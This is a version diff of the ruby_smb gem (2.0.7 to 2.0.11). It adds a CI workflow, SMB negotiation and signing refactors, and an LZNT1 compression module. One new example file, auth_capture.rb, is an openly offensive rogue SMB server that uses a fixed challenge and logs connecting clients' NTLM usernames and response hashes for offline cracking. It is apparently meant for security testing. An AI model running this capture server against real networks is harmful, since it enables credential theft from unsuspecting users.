ruby_smb 2.0.7 → 2.0.11

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: c1e0d11d506c513f94ddc1efedf51d0e65b5a5f888f8d176cd93ffb960837ba9
-  data.tar.gz: b971db16ef47093b1d94ff9197b3cf5d222cbd475d9fda693bb0909341605072
+  metadata.gz: c45b986cea81d23700cf798535e234f058639645ff38416ca2caac32f4fd4958
+  data.tar.gz: 6c5efa5a6e195767262f63a3f49043e7abda4e11dc763bb83553a6507a9242fd
 SHA512:
-  metadata.gz: cb50b51053a49ad9d06109b882eaad4288329f58609626630b4cb3b77cf88acf9fa51243778741d1fac514904bee5cb46ccb97af211aee3983b2ef03a93b47a8
-  data.tar.gz: c57b3002a49e2a001fd17b1e088ad74dd8b1b465c6d393611817be2ae71217bde1f86fe579025a0af23b8d6e8d894a1ae24f376fda8dc24d5e2a2f274c65ae9f
+  metadata.gz: f6a54c8d0e8faf6d4ec317808ba077e01c470646e13b1b9c5b56c25f1fdc32bc101f137357112e6394c9111aae02d7bd47612f0f8f09226d1fdd9b595070a16a
+  data.tar.gz: 598e2c300856315be3d522ccce9b639f4159995b7c99595cd5cac1c167bea972f9d0cce380fa4da001bdf7c3d9515d1d23194780fd7de53355f968580d273103

data/.github/workflows/verify.yml

@@ -0,0 +1,57 @@
+name: Verify
+
+on:
+  push:
+    branches:
+      - '*'
+  pull_request:
+    branches:
+      - '*'
+
+jobs:
+  test:
+    runs-on: ubuntu-16.04
+    timeout-minutes: 40
+
+    strategy:
+      fail-fast: true
+      matrix:
+        ruby:
+          - 2.5
+          - 2.6
+          - 2.7
+          - 3.0
+        test_cmd:
+          - bundle exec rspec
+
+    env:
+      RAILS_ENV: test
+
+    name: Ruby ${{ matrix.ruby }} - ${{ matrix.test_cmd }}
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v2
+
+      - uses: actions/setup-ruby@v1
+        with:
+          ruby-version: ${{ matrix.ruby }}
+
+      - name: Setup bundler
+        run: |
+          gem install bundler
+      - uses: actions/cache@v2
+        with:
+          path: vendor/bundle
+          key: ${{ runner.os }}-gems-${{ hashFiles('**/Gemfile.lock') }}
+          restore-keys: |
+            ${{ runner.os }}-gems-
+      - name: Bundle install
+        run: |
+          bundle config path vendor/bundle
+          bundle install --jobs 4 --retry 3
+      - name: ${{ matrix.test_cmd }}
+        run: |
+          echo "${CMD}"
+          bash -c "${CMD}"
+        env:
+          CMD: ${{ matrix.test_cmd }}

data/README.md

@@ -1,6 +1,5 @@
 # RubySMB
 
-[![Build Status](https://travis-ci.org/rapid7/ruby_smb.svg?branch=master)](https://travis-ci.org/rapid7/ruby_smb)
 [![Code Climate](https://codeclimate.com/github/rapid7/ruby_smb.png)](https://codeclimate.com/github/rapid7/ruby_smb)
 [![Coverage Status](https://coveralls.io/repos/github/rapid7/ruby_smb/badge.svg?branch=master)](https://coveralls.io/github/rapid7/ruby_smb?branch=master)
 

data/examples/auth_capture.rb

@@ -0,0 +1,71 @@
+#!/usr/bin/ruby
+
+require 'bundler/setup'
+require 'ruby_smb'
+require 'ruby_smb/gss/provider/ntlm'
+
+# we just need *a* default encoding to handle the strings from the NTLM messages
+Encoding.default_internal = 'UTF-8' if Encoding.default_internal.nil?
+
+def bin_to_hex(s)
+  s.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join
+end
+
+# this is a custom NTLM provider that will log the challenge and responses for offline cracking action!
+class HaxorNTLMProvider < RubySMB::Gss::Provider::NTLM
+  class Authenticator < RubySMB::Gss::Provider::NTLM::Authenticator
+    # override the NTLM type 3 process method to extract all of the valuable information
+    def process_ntlm_type3(type3_msg)
+      username = "#{type3_msg.domain.encode}\\#{type3_msg.user.encode}"
+      _, client = ::Socket::unpack_sockaddr_in(@server_client.getpeername)
+
+      hash_type = nil
+      hash = "#{type3_msg.user.encode}::#{type3_msg.domain.encode}"
+
+      case type3_msg.ntlm_version
+      when :ntlmv1
+        hash_type = 'NTLMv1-SSP'
+        hash << ":#{bin_to_hex(type3_msg.lm_response)}"
+        hash << ":#{bin_to_hex(type3_msg.ntlm_response)}"
+        hash << ":#{bin_to_hex(@server_challenge)}"
+      when :ntlmv2
+        hash_type = 'NTLMv2-SSP'
+        hash << ":#{bin_to_hex(@server_challenge)}"
+        # NTLMv2 responses consist of the proof string whose calculation also includes the additional response fields
+        hash << ":#{bin_to_hex(type3_msg.ntlm_response[0...16])}"  # proof string
+        hash << ":#{bin_to_hex(type3_msg.ntlm_response[16.. -1])}" # additional response fields
+      end
+
+      unless hash_type.nil?
+        version = @server_client.metadialect.version_name
+        puts "[#{version}] #{hash_type} Client   : #{client}"
+        puts "[#{version}] #{hash_type} Username : #{username}"
+        puts "[#{version}] #{hash_type} Hash     : #{hash}"
+      end
+
+      WindowsError::NTStatus::STATUS_ACCESS_DENIED
+    end
+  end
+
+  def new_authenticator(server_client)
+    # build and return an instance that can process and track stateful information for a particular connection but
+    # that's backed by this particular provider
+    Authenticator.new(self, server_client)
+  end
+
+  # we're overriding the default challenge generation routine here as opposed to leaving it random (the default)
+  def generate_server_challenge(&block)
+    "\x11\x22\x33\x44\x55\x66\x77\x88"
+  end
+end
+
+# define a new server with the custom authentication provider
+server = RubySMB::Server.new(
+  gss_provider: HaxorNTLMProvider.new
+)
+puts "server is running"
+server.run do
+  puts "received connection"
+  # accept all of the connections and run forever
+  true
+end

data/lib/ruby_smb/client/negotiation.rb

@@ -57,15 +57,20 @@ module RubySMB
 
       # Takes the raw response data from the server and tries
       # parse it into a valid Response packet object.
-      # This method currently assumes that all SMB1 will use Extended Security.
       #
       # @param raw_data [String] the raw binary response from the server
       # @return [RubySMB::SMB1::Packet::NegotiateResponseExtended] when the response is an SMB1 Extended Security Negotiate Response Packet
+      # @return [RubySMB::SMB1::Packet::NegotiateResponse] when the response is an SMB1 Negotiate Response Packet
       # @return [RubySMB::SMB2::Packet::NegotiateResponse] when the response is an SMB2 Negotiate Response Packet
       def negotiate_response(raw_data)
         response = nil
         if smb1
           packet = RubySMB::SMB1::Packet::NegotiateResponseExtended.read raw_data
+
+          unless packet.valid?
+            packet = RubySMB::SMB1::Packet::NegotiateResponse.read raw_data
+          end
+
           response = packet if packet.valid?
         end
         if (smb2 || smb3) && response.nil?
@@ -74,17 +79,10 @@ module RubySMB
         end
         if response.nil?
           if packet.packet_smb_version == 'SMB1'
-            extended_security = if packet.is_a? RubySMB::SMB1::Packet::NegotiateResponseExtended
-              packet.parameter_block.capabilities.extended_security
-            else
-              "n/a"
-            end
             raise RubySMB::Error::InvalidPacket.new(
               expected_proto:  RubySMB::SMB1::SMB_PROTOCOL_ID,
-              expected_cmd:    RubySMB::SMB1::Packet::NegotiateResponseExtended::COMMAND,
-              expected_custom: "extended_security=1",
-              packet:          packet,
-              received_custom: "extended_security=#{extended_security}"
+              expected_cmd:    RubySMB::SMB1::Packet::NegotiateResponse::COMMAND,
+              packet:          packet
             )
           elsif packet.packet_smb_version == 'SMB2'
             raise RubySMB::Error::InvalidPacket.new(
@@ -123,7 +121,7 @@ module RubySMB
           'SMB1'
         when RubySMB::SMB2::Packet::NegotiateResponse
           self.smb1 = false
-          unless packet.dialect_revision.to_i == 0x02ff
+          unless packet.dialect_revision.to_i == RubySMB::SMB2::SMB2_WILDCARD_REVISION
             self.smb2 = packet.dialect_revision.to_i >= 0x0200 && packet.dialect_revision.to_i < 0x0300
             self.smb3 = packet.dialect_revision.to_i >= 0x0300 && packet.dialect_revision.to_i < 0x0400
           end
@@ -275,8 +273,8 @@ module RubySMB
             context_type: RubySMB::SMB2::NegotiateContext::SMB2_COMPRESSION_CAPABILITIES
           )
           # Adding all possible compression algorithm even if we don't support
-          # them yet. This will force the server to disclose the support
-          # algorithms in the repsonse.
+          # them yet. This will force the server to disclose the supported
+          # algorithms in the response.
           nc.data.compression_algorithms << RubySMB::SMB2::CompressionCapabilities::LZNT1
           nc.data.compression_algorithms << RubySMB::SMB2::CompressionCapabilities::LZ77
           nc.data.compression_algorithms << RubySMB::SMB2::CompressionCapabilities::LZ77_Huffman

data/lib/ruby_smb/client.rb

@@ -2,18 +2,19 @@ module RubySMB
   # Represents an SMB client capable of talking to SMB1 or SMB2 servers and handling
   # all end-user client functionality.
   class Client
+    require 'ruby_smb/ntlm'
+    require 'ruby_smb/signing'
     require 'ruby_smb/client/negotiation'
     require 'ruby_smb/client/authentication'
-    require 'ruby_smb/client/signing'
     require 'ruby_smb/client/tree_connect'
     require 'ruby_smb/client/echo'
     require 'ruby_smb/client/utils'
     require 'ruby_smb/client/winreg'
     require 'ruby_smb/client/encryption'
 
+    include RubySMB::Signing
     include RubySMB::Client::Negotiation
     include RubySMB::Client::Authentication
-    include RubySMB::Client::Signing
     include RubySMB::Client::TreeConnect
     include RubySMB::Client::Echo
     include RubySMB::Client::Utils
@@ -277,7 +278,8 @@ module RubySMB
     # @param smb1 [Boolean] whether or not to enable SMB1 support
     # @param smb2 [Boolean] whether or not to enable SMB2 support
     # @param smb3 [Boolean] whether or not to enable SMB3 support
-    def initialize(dispatcher, smb1: true, smb2: true, smb3: true, username:, password:, domain: '.', local_workstation: 'WORKSTATION', always_encrypt: true)
+    def initialize(dispatcher, smb1: true, smb2: true, smb3: true, username:, password:, domain: '.',
+                   local_workstation: 'WORKSTATION', always_encrypt: true, ntlm_flags: default_flags)
       raise ArgumentError, 'No Dispatcher provided' unless dispatcher.is_a? RubySMB::Dispatcher::Base
       if smb1 == false && smb2 == false && smb3 == false
         raise ArgumentError, 'You must enable at least one Protocol'
@@ -296,7 +298,7 @@ module RubySMB
       @smb3              = smb3
       @username          = username.encode('utf-8') || ''.encode('utf-8')
       @max_buffer_size   = MAX_BUFFER_SIZE
-      # These sizes will be modifed during negotiation
+      # These sizes will be modified during negotiation
       @server_max_buffer_size = SERVER_MAX_BUFFER_SIZE
       @server_max_read_size   = RubySMB::SMB2::File::MAX_PACKET_SIZE
       @server_max_write_size  = RubySMB::SMB2::File::MAX_PACKET_SIZE
@@ -306,18 +308,12 @@ module RubySMB
       # SMB 3.x options
       @session_encrypt_data = always_encrypt
 
-      negotiate_version_flag = 0x02000000
-      flags = Net::NTLM::Client::DEFAULT_FLAGS |
-        Net::NTLM::FLAGS[:TARGET_INFO] |
-        negotiate_version_flag ^
-        Net::NTLM::FLAGS[:OEM]
-
       @ntlm_client = Net::NTLM::Client.new(
         @username,
         @password,
         workstation: @local_workstation,
         domain: @domain,
-        flags: flags
+        flags: ntlm_flags
       )
 
       @tree_connects = []
@@ -368,31 +364,28 @@ module RubySMB
 
     # Performs protocol negotiation and session setup. It defaults to using
     # the credentials supplied during initialization, but can take a new set of credentials if needed.
-    def login(username: self.username, password: self.password, domain: self.domain, local_workstation: self.local_workstation)
+    def login(username: self.username, password: self.password,
+              domain: self.domain, local_workstation: self.local_workstation,
+              ntlm_flags: default_flags)
       negotiate
-      session_setup(username, password, domain, true,
-                    local_workstation: local_workstation)
+      session_setup(username, password, domain,
+                    local_workstation: local_workstation,
+                    ntlm_flags: ntlm_flags)
     end
 
     def session_setup(user, pass, domain, do_recv=true,
-                      local_workstation: self.local_workstation)
+                      local_workstation: self.local_workstation, ntlm_flags: default_flags)
       @domain            = domain
       @local_workstation = local_workstation
       @password          = pass.encode('utf-8') || ''.encode('utf-8')
       @username          = user.encode('utf-8') || ''.encode('utf-8')
 
-      negotiate_version_flag = 0x02000000
-      flags = Net::NTLM::Client::DEFAULT_FLAGS |
-        Net::NTLM::FLAGS[:TARGET_INFO] |
-        negotiate_version_flag ^
-        Net::NTLM::FLAGS[:OEM]
-
       @ntlm_client = Net::NTLM::Client.new(
           @username,
           @password,
           workstation: @local_workstation,
           domain: @domain,
-          flags: flags
+          flags: ntlm_flags
       )
 
       authenticate
@@ -431,7 +424,7 @@ module RubySMB
     end
 
     # Sends a packet and receives the raw response through the Dispatcher.
-    # It will also sign the packet if neccessary.
+    # It will also sign the packet if necessary.
     #
     # @param packet [RubySMB::GenericPacket] the request to be sent
     # @param encrypt [Boolean] true if encryption has to be enabled for this transaction
@@ -444,14 +437,14 @@ module RubySMB
       when 'SMB1'
         packet.smb_header.uid = self.user_id if self.user_id
         packet.smb_header.pid_low = self.pid if self.pid
-        packet = smb1_sign(packet)
+        packet = smb1_sign(packet) if signing_required && !session_key.empty?
       when 'SMB2'
         packet = increment_smb_message_id(packet)
         packet.smb2_header.session_id = session_id
-        unless packet.is_a?(RubySMB::SMB2::Packet::SessionSetupRequest)
-          if self.smb2
+        unless packet.is_a?(RubySMB::SMB2::Packet::SessionSetupRequest) || session_key.empty?
+          if self.smb2 && signing_required
             packet = smb2_sign(packet)
-          elsif self.smb3
+          elsif self.smb3 && (signing_required || packet.is_a?(RubySMB::SMB2::Packet::TreeConnectRequest))
             packet = smb3_sign(packet)
           end
         end
@@ -654,5 +647,17 @@ module RubySMB
         @preauth_integrity_hash_value + data.to_binary_s
       )
     end
+
+    private
+
+    def default_flags
+      negotiate_version_flag = 0x02000000
+      flags = Net::NTLM::Client::DEFAULT_FLAGS |
+        RubySMB::NTLM::NEGOTIATE_FLAGS[:TARGET_INFO] |
+        negotiate_version_flag ^
+        RubySMB::NTLM::NEGOTIATE_FLAGS[:OEM]
+
+      flags
+    end
   end
 end

data/lib/ruby_smb/compression/lznt1.rb

@@ -0,0 +1,164 @@
+module RubySMB
+  module Compression
+    module LZNT1
+      def self.compress(buf, chunk_size: 0x1000)
+        out = ''
+        until buf.empty?
+          chunk = buf[0...chunk_size]
+          compressed = compress_chunk(chunk)
+          # chunk is compressed
+          if compressed.length < chunk.length
+            out << [0xb000 | (compressed.length - 1)].pack('v')
+            out << compressed
+          else
+            out << [0x3000 | (chunk.length - 1)].pack('v')
+            out << chunk
+          end
+          buf = buf[chunk_size..-1]
+          break if buf.nil?
+        end
+
+        out
+      end
+
+      def self.compress_chunk(chunk)
+        blob = chunk
+        out = ''
+        pow2 = 0x10
+        l_mask3 = 0x1002
+        o_shift = 12
+        until blob.empty?
+          bits = 0
+          tmp = ''
+          i = -1
+          loop do
+            i += 1
+            bits >>= 1
+            while pow2 < (chunk.length - blob.length)
+              pow2 <<= 1
+              l_mask3 = (l_mask3 >> 1) + 1
+              o_shift -= 1
+            end
+
+            max_len = [blob.length, l_mask3].min
+            offset, length = find(chunk[0...(chunk.length - blob.length)], blob, max_len)
+
+            # try to find more compressed pattern
+            _offset2, length2 = find(chunk[0...chunk.length - blob.length + 1], blob[1..-1], max_len)
+
+            length = 0 if length < length2
+
+            if length > 0
+              symbol = ((offset - 1) << o_shift) | (length - 3)
+              tmp << [symbol].pack('v')
+              # set the highest bit
+              bits |= 0x80
+              blob = blob[length..-1]
+            else
+              tmp += blob[0]
+              blob = blob[1..-1]
+            end
+
+            break if blob.empty? || i == 7
+          end
+
+          out << [bits >> (7 - i)].pack('C')
+          out << tmp
+        end
+
+        out
+      end
+
+      def self.decompress(buf, length_check: true)
+        out = ''
+        until buf.empty?
+          header = buf.unpack1('v')
+          length = (header & 0xfff) + 1
+          raise EncodingError, 'invalid chunk length' if length_check && length > (buf.length - 2)
+
+          chunk = buf[2...length + 2]
+          out << if header & 0x8000 == 0
+                   chunk
+                 else
+                   decompress_chunk(chunk)
+                 end
+          buf = buf[length + 2..-1]
+        end
+
+        out
+      end
+
+      def self.decompress_chunk(chunk)
+        out = ''
+        until chunk.empty?
+          flags = chunk[0].unpack1('C')
+          chunk = chunk[1..-1]
+          8.times do |i|
+            if (flags >> i & 1) == 0
+              out << chunk[0]
+              chunk = chunk[1..-1]
+            else
+              flag = chunk.unpack1('v')
+              pos = out.length - 1
+              l_mask = 0xfff
+              o_shift = 12
+              while pos >= 0x10
+                l_mask >>= 1
+                o_shift -= 1
+                pos >>= 1
+              end
+
+              length = (flag & l_mask) + 3
+              offset = (flag >> o_shift) + 1
+
+              if length >= offset
+                out_offset = out[-offset..-1]
+                tmp = out_offset * (0xfff / out_offset.length + 1)
+                out << tmp[0...length]
+              else
+                out << out[-offset..-offset + length - 1]
+              end
+              chunk = chunk[2..-1]
+            end
+            break if chunk.empty?
+          end
+        end
+
+        out
+      end
+
+      class << self
+        private
+
+        def find(src, target, max_len)
+          result_offset = 0
+          result_length = 0
+          1.upto(max_len - 1) do |i|
+            offset = src.rindex(target[0...i])
+            next if offset.nil?
+
+            tmp_offset = src.length - offset
+            tmp_length = i
+            if tmp_offset == tmp_length
+              src_offset = src[offset..-1]
+              tmp = src_offset * (0xfff / src_offset.length + 1)
+              i.upto(max_len) do |j|
+                offset = tmp.rindex(target[0...j])
+                break if offset.nil?
+
+                tmp_length = j
+              end
+            end
+
+            if tmp_length > result_length
+              result_offset = tmp_offset
+              result_length = tmp_length
+            end
+          end
+
+          result_length < 3 ? [0, 0] : [result_offset, result_length]
+        end
+      end
+    end
+  end
+end